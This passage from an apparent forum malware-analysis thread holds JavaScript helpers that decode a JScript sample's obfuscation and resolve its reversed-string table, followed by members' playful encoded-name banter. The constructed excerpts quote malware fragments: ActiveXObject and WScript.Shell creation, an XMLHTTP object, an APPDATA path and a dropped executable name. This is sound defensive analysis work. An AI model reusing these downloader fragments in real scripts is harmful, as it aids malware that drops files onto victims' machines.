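// The groups each placeholder expands to, joined by RS (the sample's s[0][1]).
const GROUPS = ["var ", "new ActiveXObject(", "Scripting.FileSystemObject", ")"].join(RS);

// Constructed obfuscated text (the sample's s[0][0]): placeholders instead of
// the groups above, US instead of the quotes.
const OBFUSCATED = "\x01fso = \x02" + US + "\x03" + US + "\x04;";

// Decode one payload the way the sample does.  s is the array-in-array the
// sample passes in, t the string of placeholder chars (the sample's t).
function decodeStage1(s, t) {
  let o = "";
  for (let i = 0; i < s.length; i++) {
    const r = t + s[i][2];        // s[i][2] is "" in the sample, so r === t
    const a = s[i][1].split(RS);  // one replacement group per placeholder
    let text = s[i][0];
    // Walk from the last placeholder down to the first: every occurrence of
    // r[j] is replaced by group a[j] (split/join multi-replacement).
    for (let j = a.length - 1; j >= 0; j--) {
      text = text.split(r.charAt(j)).join(a[j]);
    }
    o += text;
  }
  return o.replace(new RegExp(US, "g"), "\"");
}

// Render control characters by their ASCII names (as the editor in part 3
// does), so the otherwise invisible placeholders can be seen in output.
function showControls(str) {
  const names = ["NUL","SOH","STX","ETX","EOT","ENQ","ACK","BEL","BS","HT","LF","VT","FF","CR","SO","SI",
    "DLE","DC1","DC2","DC3","DC4","NAK","SYN","ETB","CAN","EM","SUB","ESC","FS","GS","RS","US"];
  return str.replace(/[\x00-\x1f]/g, c => "<" + names[c.charCodeAt(0)] + ">");
}

function decodeDemo() {
  const payload = [[OBFUSCATED, GROUPS, ""]];
  return decodeStage1(payload, PLACEHOLDERS);
}

console.log(showControls(OBFUSCATED));
console.log(decodeDemo());
```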
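A second added example (again not the post's or the sample's own code): statically resolving the reversed-string table from parts 5 and 6, so that every $BJqo6Cmx7GvgxeFsior(N) call in the listing reads as its literal without running the script; the excerpt it parses is constructed from the listing above and the function names are assumptions.

```javascript
// Added example, not code from the post or from the sample: statically
// resolve the reversed-string table from parts 5 and 6 so that every
// $BJqo6Cmx7GvgxeFsior(N) call reads as its literal, without running the
// script.  STAGE2 is a constructed excerpt shaped like the listing in 4-2;
// function names are assumptions.

const LOOKUP_NAME = "$BJqo6Cmx7GvgxeFsior";

// Constructed excerpt: the string table plus three lines that use it.
const STAGE2 = [
  LOOKUP_NAME + '.list = ["PTTHLMX.2LMXSM", "exe.T1973HDA", " x exe.az7", "llehS.tpircSW", "%ATADPPA%"];',
  "var c = new ActiveXObject(" + LOOKUP_NAME + "(3)),",
  "    d = c.ExpandEnvironmentStrings(" + LOOKUP_NAME + "(4));",
  "Str7zip = folderName + \"\\\\\" + " + LOOKUP_NAME + "(2) + l;",
].join("\n");

// Reverse a string the way the sample's lookup function does.
function flip(str) {
  return str.split("").reverse().join("");
}

// Pull the `.list = [...]` literal out of the script and return the table
// with every string flipped.  The literal is JSON-compatible (the "\\" in
// the registry paths is a valid JSON escape), so it is parsed, not eval'd.
function extractTable(src) {
  const m = src.match(/\.list\s*=\s*(\[[\s\S]*?\]);/);
  if (!m) throw new Error("no string table found");
  return JSON.parse(m[1]).map(v => (typeof v === "string" ? flip(v) : v));
}

// Replace every LOOKUP_NAME(N) call with the resolved string literal; an
// index outside the table is flagged in place rather than silently dropped.
function resolveCalls(src, table) {
  const escaped = LOOKUP_NAME.replace(/\$/g, () => "\\$");
  const re = new RegExp(escaped + "\\((\\d+)\\)", "g");
  return src.replace(re, (_, n) => {
    const idx = Number(n);
    if (idx >= table.length) return "/* index " + n + " out of range */";
    return JSON.stringify(table[idx]);
  });
}

function resolveDemo() {
  const table = extractTable(STAGE2);
  return { table, resolved: resolveCalls(STAGE2, table) };
}

console.log(resolveDemo().resolved);
```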
 

DardiM

Thank you for the explanations! Hugs!!!!! I was kinda lost when I first encountered the reverse strings, now that you have decoded it, I can see what it does. ;);):):)
Thanks :)
I have also put with this last part a great link to an online tool to reverse / flip a word / sentence, etc.
 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
I have now read part 2 and have to say your analysis and explanations just get better each time. I feel I learn so much when I read your posts. Thank you. Please keep the lessons coming!

I agree, Penguin has really stepped up his game in regards to his explanations and breakdowns, Bravo to the manchot!
Now if he can keep a certain penguin safe from always infecting himself, he would be PRO and over "9"000.
 

DardiM

I agree, Penguin has really stepped up his game in regards to his explanations and breakdowns, Bravo to the manchot!
Now if he can keep a certain penguin safe from always infecting himself, he would be PRO and over "9"000.
Bravo to the manchot
Merci ! ;)

And also thank you for your remarks and advice, in PM, to help me improve my analysis posts :)
 

Svoll

Bravo to the manchot
Merci ! ;)

And also thank you for your remarks and advice, in PM, to help me improve my analysis posts :)

That's evil, you just called me bad at computers because I know nothing about it and have to ask you in PM! Bad Penguin

01010000 01100101 01101110 01100111 01110101 01101001 01101110 01000101 01111000 01110100 01100101 01110010 01101101 01101001 01101110 01100001 01110100 01101111 01110010
 

DardiM

That's evil, you just called me bad at computers because I know nothing about it and have to ask you in PM! Bad Penguin

01010000 01100101 01101110 01100111 01110101 01101001 01101110 01000101 01111000 01110100 01100101 01110010 01101101 01101001 01101110 01100001 01110100 01101111 01110010

=> I like your signature: "PenguinExterminator"
=> you really help to improve my posts, don't you remember your advice to make my posts clearer and more understandable?
=> shy Svoll who doesn't want people to know he helps people (even Penguins/Manchots)!

=> U3ZvbGxhcmRpTQ==
 

Svoll

You are too kind, I didn't do anything; in fact you are the one who is coaching me on malware testing and preparing me to do sample testing on the HUB, for that I thank you!

-. --- --..-- / .. - ... / .--. . -. --. ..- .. -. . -..- - . .-. -- .. -. .- - --- .-. --..-- / -. --- - / ... ...- --- .-.. .-.. .- .-. -.. .. --

or maybe :

80 101 110 103 117 105 110 84 114 97 105 110 101 101
 

DardiM

Just the decoded part so everybody understands :)

U3ZvbGxhcmRpTQ==
=> SvollardiM
You are too kind, I didn't do anything; in fact you are the one who is coaching me on malware testing and preparing me to do sample testing on the HUB, for that I thank you!

-. --- --..-- / .. - ... / .--. . -. --. ..- .. -. . -..- - . .-. -- .. -. .- - --- .-. --..-- / -. --- - / ... ...- --- .-.. .-.. .- .-. -.. .. --

or maybe :

80 101 110 103 117 105 110 84 114 97 105 110 101 101
NO, IT'S PENGUINEXTERMINATOR, NOT SVOLLARDIM
or maybe :
PenguinTrainee
 
